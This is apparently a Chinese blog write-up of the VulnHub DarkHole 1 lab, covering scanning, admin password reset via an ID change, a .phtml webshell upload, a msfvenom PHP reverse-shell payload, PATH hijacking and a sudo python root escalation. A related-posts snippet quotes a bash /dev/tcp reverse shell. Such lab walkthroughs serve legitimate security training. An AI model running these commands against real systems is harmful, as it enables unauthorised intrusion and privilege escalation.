darkhole1靶场

已于 2023-06-16 14:37:54 修改
阅读量149 收藏 2
点赞数
分类专栏: vulnhub靶场 文章标签: php 服务器 linux
于 2023-06-14 20:02:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjxxxy/article/details/131214739
版权

一、靶场介绍

1.下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip
2.将靶机网络适配器改为NAT模式
在这里插入图片描述
3.启动靶机

二、信息收集

1、主机发现

nmap -sn 192.168.111.1/24

在这里插入图片描述
2.端口扫描

nmap -A 192.168.111.134 -p 1-65535

在这里插入图片描述
3.目录扫描

dirsearch -u 192.168.111.134 -e *

在这里插入图片描述
4.网页访问
在这里插入图片描述

三、渗透流程

1.网页显示有login,尝试注册账号登录:zjx/zjx@qq.com/123456
在这里插入图片描述
登录成功:
在这里插入图片描述
2.使用BP抓包,当前id=2,猜测id=1为管理员账户,修改id=1
在这里插入图片描述
3.尝试使用管理员:admin加刚刚修改的密码:111进行登录
在这里插入图片描述
4.新页面有文件上传点,尝试上传一句话木马,发现限制了上传格式
在这里插入图片描述
5.尝试上传特殊后缀文件:.phtml
在这里插入图片描述
6.浏览器访问1.phtml
回显空白,成功上传:
在这里插入图片描述
7.使用蚁剑连接
在这里插入图片描述
8.kali生成shell脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.128 lport=4444 -o msfshell.php

在这里插入图片描述
9.把2.php放入靶机中
在这里插入图片描述
10.kali开启msf监听,浏览器访问木马文件
在这里插入图片描述
在这里插入图片描述
11.进入shell,生成交互shell

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
12.查看敏感文件,发现有两个用户
在这里插入图片描述
13.在用户目录下发现可执行文件toto
在这里插入图片描述
14.利用环境变量切换得到用户shell

echo "/bin/bash" > /tmp/id
export PATH=/tmp:$PATH
./toto

在这里插入图片描述

15.查看当前用户家目录,并且找到了密码:root123
在这里插入图片描述

16.登录到john用户,查看用户权限
在这里插入图片描述
17.根据提示,在file.py里写入shell代码并运行,提权成功

echo "import pty;pty.spawn('/bin/bash')" > file.py
sudo python3 /home/john/file.py

在这里插入图片描述

zjxxxy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传靶场1-11关
09-09
文件上传靶场1-11关
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 4361
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
DarkHole靶机渗透
W_an_feng_的博客
06-10 295
DarkHole靶机渗透
vulnhub靶场实战——DarkHole
weixin_71914594的博客
10-15 302
靶场地址:https://www.vulnhub.com/entry/darkhole-1,724/下载连接:https://download.vulnhub.com/darkhole/DarkHole.zip解压后打开ova文件配置网络设置为Net模式。
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 2587
VulnHub-DarkHole:1靶机详细渗透教程
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
uploadlabs靶场文件
02-27
1. **靶场(Target Range)**:靶场是指一种模拟真实环境的系统,通常用于安全测试、漏洞挖掘或训练目的。在本案例中,uploadlabs靶场提供了一个模拟网站,可以测试和演示文件上传漏洞。 2. **PHPStudy**:PHPStudy...
开源靶场zsbdzsbd
04-19
1. **漏洞分类与利用**:学习不同类型的漏洞,如Web应用漏洞、操作系统漏洞等,以及针对这些漏洞的利用方法和防范措施。 2. **渗透测试工具**:了解并掌握常用的渗透测试工具,如Nmap进行端口扫描,Burp Suite抓包...
DarkHole1打靶记录
wwd180的博客
06-15 120
实验主机:攻击机kali(192.168.109.131)靶机DarkHole(192.168.109.132)实验目标:获取root权限 + flag实验网络:NAT。
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 593
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
DarkHole1 vulnhub靶场
weixin_62621015的博客
03-14 189
DarkHole1 vulnhub靶场个人通关笔记
靶场练习 NO.26 DarkHole1 任意账号重置登录管理员账号,phtml特殊后缀解析上传成功,pkexec提权或者修改环境变量伪造id命令为bash+sudo
YouthBelief的博客
03-08 820
DarkHole10x00 环境准备0x01 信息收集步骤一: ip探测步骤二:端口服务识别0x02 漏洞探测步骤一:80端口探测步骤二:注册后登录后台测漏洞步骤三:测试上述漏洞任意账号密码重置步骤四:登录id为1的账号(应该为管理员)步骤五:上传php木马(失败,黑名单)(1)上传php尝试(2)上传.txt .aaa尝试步骤六:尝试黑名单绕过(1)确定信息(2)尝试apache多后缀解析(失败)(3)尝试.htaccess(失败)(4) PHP大写绕过(上传成功,不解析)(5)php其余后缀(phtml
darkhole1靶场渗透通关
tpaer的博客
10-02 982
记录下靶场实战的通关过程。主要通关流程是利用web页面的逻辑漏洞进行越权,再绕过文件上传黑名单上传木马getshell,最后通过本地环境变量进行提权。只是一种思路,也可以用一些其他通杀漏洞(CVE-2021-4034)来打。
【安全】vulnub靶机DARKHOLE: 1
qq_43017750的博客
01-20 4192
DARKHOLE: 1 About Release Back to the Top Name: DarkHole: 1 Date release: 18 Jul 2021 Author: Jehad Alqurashi Series: DarkHole Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that a
vulnhub靶机-DarkHole: 1
臭nana的博客
08-25 1025
靶机描述: Difficulty: Easy It's a box for beginners, but not easy, Good Luck Hint: Don't waste your time For Brute-Force 1、找到靶机ip:192.168.162.132 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????kali)-[~] └─# nmap -A -p- 192.168.116.132
DARKHOLE_1攻略
11-26 930
DARKHOLE_1攻略 简介DARKHOLE_1攻略攻击环境:kali被攻击环境:ubuntukali IP:192.168.133.131ubuntu IP : 未知1.主机发现​ 因为攻击机与被攻击机在同一网段,所以需要通过nmap 进一步确定其ipnmap -sP 所处网段example:nmap -sP 192.168.133.0/24​ 分析可知 Ubuntu ip 为 192.168.133.1352.端口扫描​ 全面扫描,获取端口,判断被攻击者所开服务 nmap -A DARKHOLE_
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3769
vulnhub靶场——DarkHole 1 WriteUp
DarkHole_1
weixin_47311099的博客
09-27 947
DarkHole_1攻略 主机发现 ┌──(root????kali)-[~] └─# nmap -sP 192.168.8.0/24 目标靶机为192.168.8.134 全面端口扫描 ┌──(root????kali)-[~] └─# nmap -A 192.168.8.134 22ssh和80http 访问80 发现登录页面 但是我们并不知道用户名密码 越权 点击sign up now 去注册用户 登录后发现存在改密码选项,抓包查看 发现其id为2,可推测id为1的应该是默认的管
flag 格式为 DarkHole{‘ ************************** ‘}啥意思
最新发布
08-24
"flag 格式为 DarkHole{‘ ************************** ‘}" 这通常是指密码学、网络安全或挑战赛解密中的旗面(Flag)格式。在这样的表示中,DarkHole是一个可能的比赛或挑战的名字,而{...}内的内容可能是加密、混淆或者其他处理过的字符串,实际的旗面信息隐藏在这个看起来像随机字符的字符串中。参与者需要通过各种技术手段(如密码分析、字典攻击等)来解析这个字符串,找到真正的旗面(通常是比赛结果或者提示下一步任务的关键)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值